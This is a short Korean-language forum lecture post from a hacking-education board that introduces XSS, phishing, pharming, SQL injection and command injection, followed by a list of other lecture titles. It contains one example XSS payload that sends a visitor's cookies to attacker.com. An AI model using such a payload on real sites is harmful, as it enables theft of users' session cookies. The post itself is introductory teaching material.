1581, 76/80 회원가입  로그인  
   사용중
   http://www.cyworld.com/csy_lovely
   웹 해킹에대해서 알아보자 (2)

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1829 [복사]


1. Web hacking 유형
Cross-Site Scripting(XSS)
공격대상 사이트에 공격자 사이트를 크로스(걸쳐서)시켜서 공격하는 방법
<Cookie 빼내기 공격 예>
<script>document.location="http://attacker.com/attack/cookie attack.php?query="+document.cookie</script>
(웹 페이지에 악성코드를 삽입하여 접근하는 클라이언트에 자동실행)
피싱 : 공격자가 피싱메일을 발송 > victim이 이메일 내용에 현혹 > 링크되어 있는 사이트를 클릭
vkald : dns조작을 통한 피싱 업그레이드 버전 (web firewall에서 차단 불가능)

피싱과 파밍이 문제가 되고있는 까닭?  < money >

SQL Injection
웹 애플리케이션에 의도적으로 SQL문을 삽입하여 로그인 인증과정을 우회하거나 공격자가 악의적인 쿼리문을 DB에 보내어 문제를 발생시킴 (DB정보 유출에서 포멧까지 다양한 공격가능) 웹 해킹중 가장 강력한공격

Command Injection
웹 애플리케이션에서 HTML 형식이나 쿠키, URL 파라미터 형식으로 시스템 명령어를 삽입 허용함으로써 웹 상에서도 시스템 명령을 실행할 수 있는 취약점

  Hit : 8602     Date : 2011/08/03 01:13



    
hacker테디 잘봣습니다 감사합니당 2011/09/10  
81   < 리눅스 참조 가이드 > 1     사용중
08/02 7265
80   < 리눅스 참조 가이드 > 2     사용중
08/02 7307
79   < 리눅스 참조 가이드 > 3      사용중
08/02 7494
78   < 리눅스 참조 가이드 > 4     사용중
08/02 7535
77   리눅스(9) 리눅스 명령어 1~8     사용중
08/02 8485
76   웹 해킹에대해서 알아보자 (1)[7]     사용중
08/03 8549
  웹 해킹에대해서 알아보자 (2)[1]     사용중
08/03 8601
74   웹 해킹에대해서 알아보자 (3)[1]     사용중
08/03 7653
73   웹 해킹에대해서 알아보자 (4)      사용중
08/03 8113
72   웹 해킹에대해서 알아보자 (5)[2]     사용중
08/03 8865
71   웹 해킹에대해서 알아보자 (6)[1]     사용중
08/03 7679
70   웹 해킹에대해서 알아보자 (7)[1]     사용중
08/03 8580
69   웹 해킹에대해서 알아보자 (8)[3]     사용중
08/03 8036
68   버퍼 오버 플로우에 관해서(속칭 BOF)[1]     사월
09/11 8986
67   리눅스 명령어 마스터 2[27]     소유
09/03 21362
66   리눅스 명령어 마스터 1[78]     소유
09/02 34728
65   유치원 만화 크게보기[11]     소유
09/03 18345
64   리눅스 명령어 마스터 3[13]     소유
09/04 16826
63   좋은 비밀번호란???[24]     소유
09/04 19287
62   네트워크 개념 휘어잡기 7[8]     소유
09/16 12057
[1]..[71][72][73][74][75] 76 [77][78][79][80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com